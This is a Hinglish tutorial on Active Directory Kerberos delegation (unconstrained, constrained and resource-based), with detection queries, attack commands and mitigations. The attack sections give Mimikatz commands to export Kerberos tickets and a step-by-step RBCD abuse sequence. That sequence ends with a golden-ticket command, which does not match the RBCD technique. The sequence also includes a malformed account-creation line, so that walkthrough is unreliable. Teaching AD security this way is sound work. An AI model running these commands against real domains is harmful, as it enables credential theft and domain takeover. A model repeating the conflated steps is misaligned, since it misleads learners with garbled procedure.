Active Directory Delegation

🔥 Active Directory Delegation Explained (With Attacks & Exploits) 🔥

Delegation ek powerful Kerberos authentication feature hai jo kisi service ko user ke behalf pe authenticate karne ka permission deta hai. Yeh AD me Single Sign-On (SSO) enable karne ke liye use hota hai. Agar delegation misconfigured ho, toh privilege escalation aur domain takeover possible hai. 😈

---

💡 Types of Delegation (3 Types)

AD me 3 types of delegation hote hain:

1️⃣ Unconstrained Delegation (🚨 Most Dangerous)

✅ Kya Hai?

• Jab koi service Unconstrained Delegation enabled hoti hai, toh wo kisi bhi user ka Kerberos TGT store kar sakti hai.

• Agar attacker ko machine access mil gaya, toh wo Domain Admin ka TGT le sakta hai aur full domain compromise kar sakta hai!

✅ Kaise Check Karein?

powershell

CopyEdit

Get-ADObject -Filter {userAccountControl -band 0x80000} -Properties Name

👉 Jo accounts return honge, unpe Unconstrained Delegation enabled hai.

✅ Exploitation (Attack Example) Agar attacker kisi unconstrained delegation enabled machine pe SYSTEM access le le, toh wo Mimikatz se TGT extract kar sakta hai:

powershell

CopyEdit

mimikatz.exe privilege::debug sekurlsa::tickets /export

👉 Agar Domain Admin ka ticket mila, toh full DA compromise ho sakta hai! 🚀

✅ Mitigation: ❌ Unconstrained delegation disable karo. ✅ Only necessary services ko delegation allow karo. ✅ Domain Controller pe Unconstrained Delegation kabhi enable mat karo!

---

2️⃣ Constrained Delegation (More Secure but Still Exploitable)

✅ Kya Hai?

• Constrained Delegation specific services tak authentication ko restrict karta hai.

• Matlab ek service sirf kuch specific doosri services ke behalf pe authentication kar sakti hai.

✅ Kaise Check Karein?

powershell

CopyEdit

Get-ADObject -LDAPFilter "(msDS-AllowedToDelegateTo=*)"

👉 Yeh command batayegi ki kaunse accounts pe Constrained Delegation enabled hai.

✅ Exploitation (Attack Example) Agar attacker ko Constrained Delegation wale account ka access mil jaye, toh wo kaunse services ke liye delegate kar sakta hai yeh check karega:

powershell

CopyEdit

Get-ADUser -Identity <USERNAME> -Properties msDS-AllowedToDelegateTo

🚀 Agar attacker ne ek specific service ka delegation exploit kar diya, toh lateral movement possible hai!

✅ Mitigation: ✅ Sirf trusted services ko delegation allow karo. ✅ Monitor karo ki kis account pe delegation enabled hai. ✅ Constrained Delegation wale accounts ke passwords strong rakho.

---

3️⃣ Resource-Based Constrained Delegation (RBCD) (Modern & Exploitable)

✅ Kya Hai?

• Yeh Constrained Delegation ka modern version hai jisme destination service decide karti hai ki kaun uske behalf pe authenticate kar sakta hai.

• Matlab jo resource hai (e.g., File Server, SQL Server), wahi decide karega ki delegation kisko milegi.

✅ Kaise Check Karein?

powershell

CopyEdit

Get-ADComputer -Filter {msDS-AllowedToActOnBehalfOfOtherIdentity -ne "$null"}

👉 Agar koi output aaya, toh us machine pe RBCD enabled hai.

✅ Exploitation (RBCD Attack) Agar attacker ek machine ke behalf pe doosri machine ke upar authentication enforce kar sake, toh lateral movement ho sakti hai!

🚀 Step 1: Attacker apni machine ka account create karega:

powershell

CopyEdit

New-ADComputer -Name "AttackerMachine" -SamAccountName "AttackerMachine" -Instance $Comp -PassThru

🚀 Step 2: Attacker apni machine ko "AllowedToActOnBehalfOfOtherIdentity" me add karega:

powershell

CopyEdit

Set-ADComputer -Identity "VictimServer" -PrincipalsAllowedToDelegateToAccount "AttackerMachine"

🚀 Step 3: Mimikatz se ticket inject karke access le lega:

powershell

CopyEdit

mimikatz.exe kerberos::golden /domain:<DOMAIN> /sid:<SID> /target:<DC_IP> /rc4:<NTLM_HASH> /user:Administrator /ptt

🔥 Boom! Attacker ne RBCD ka abuse karke full control le liya!

✅ Mitigation: ✅ Monitor karo ki kaun "msDS-AllowedToActOnBehalfOfOtherIdentity" ka use kar raha hai. ✅ RBCD ka use sirf trusted services ke liye karo. ✅ Strong password policies follow karo.

---

🛡 Delegation Attacks vs. Kerberoasting

Feature	Delegation Attacks	Kerberoasting
Purpose	Authentication delegation abuse	Service account ke password hash nikalna
Attack Type	Privilege Escalation	Offline Password Cracking
Requirement	Delegation-enabled account	SPN-enabled account
Target	Services with delegation enabled	Weak-password service accounts
Tools Used	Rubeus, Mimikatz, PowerView	GetUserSPNs.py, Hashcat
Risk Level	🚨 High (Domain Takeover Possible)	⚠ Medium (Depends on password strength)

---

🔥 Final Thoughts

✅ Unconstrained Delegation sabse risky hai, kyunki yeh Domain Admin ka TGT le sakta hai. ✅ RBCD exploitation kaafi advanced hai, lekin real-world lateral movement me kaam aata hai. ✅ Constrained Delegation better hai, lekin still attack possible hai agar misconfigured ho. ✅ Monitoring & mitigation karna zaroori hai to detect delegation-based attacks.